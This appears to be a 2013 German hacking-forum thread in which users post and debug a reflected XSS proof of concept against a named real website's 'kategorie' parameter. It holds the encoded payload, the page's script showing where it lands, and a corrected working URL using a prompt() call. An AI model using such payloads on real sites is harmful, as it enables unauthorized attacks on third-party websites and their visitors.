Sign In
Create Account
http://www.cantwo.de/einzelbilder.php?kategorie=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28byxoil%29%3C%2fScRiPt%3E
lg
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
xss cantwo.com
Started by
XoiL
#1
Posted 23 October 2013 - 16:42 Uhr
XoiL
-
-
Banned -
- 1 posts
- 14 Bedankt
Leecher
Likes
2
-
Android [root], Blackberry -
Linux
nebenbei
lg
lg
Back to top
Report
#2
Posted 23 October 2013 - 16:52 Uhr
juPP
-
- Premium Member
-
- 174 posts
- 61 Bedankt
Hacker
Likes
49
-
000000
-
Blackberry
-
Windows, Linux
Nanana. lass doch die armen writer in ruhe 
Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
<script>
$(document).ready(function(){
//Examples of how to assign the ColorBox event to elements
$(".group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>").colorbox({rel:'group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>', transition:"none", width:"90%"});
$(".group2").colorbox({rel:'group2', transition:"fade"});
$(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
$(".group4").colorbox({rel:'group4', slideshow:true});
$(".callbacks").colorbox({
onOpen:function(){ alert('onOpen: colorbox is about to open'); },
onload:function(){ alert('onload: colorbox has started to load the targeted content'); },
onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
});
//Example of preserving a Javascript event for inline calls.
$("#click").click(function(){
$('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
return false;
});
});
</script>
... hier könnte Ihre Werbung stehen
#3
Posted 23 October 2013 - 17:02 Uhr
XoiL
-
-
Banned -
- 1 posts
- 14 Bedankt
Leecher
Likes
2
-
Android [root], Blackberry
-
Linux
#4
Posted 23 October 2013 - 17:24 Uhr
Laggy
-
- Premium Member
-
- 11 posts
- 0 Bedankt
Noob
Likes
8
-
Vuln Reporter
Liegt daran, dass Text in der Klammer steht (zahlen würden gehn) und sowohl ' wie auch " gefilert und durch /' bzw /" ersetzt werdenIch kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
So funzts dann
http://www.cantwo.de/einzelbilder.php?kategorie=<script>prompt(/byxoil/)</script>
Edited by Laggy, 23 October 2013 - 17:28 Uhr.
| Topic | Forum | Started By | Stats | Last Post Info | |
|---|---|---|---|---|---|
[xss] lablue.de |
 Classic Hacking
|
|
|
|
|
CVE-2013-6837 - DOM Based XSS DOM XSS, XSS, pentest
|
Classic Hacking
|
vestas88 |
|
|
|
[XSS] de.filesovermiles.com |
Classic Hacking
|
SecurityFlaw |
|
|
user(s) are reading this topic
members, guests, anonymous users
This topic has been visited by 3 user(s)
Hacking & Security
Made with in germany.
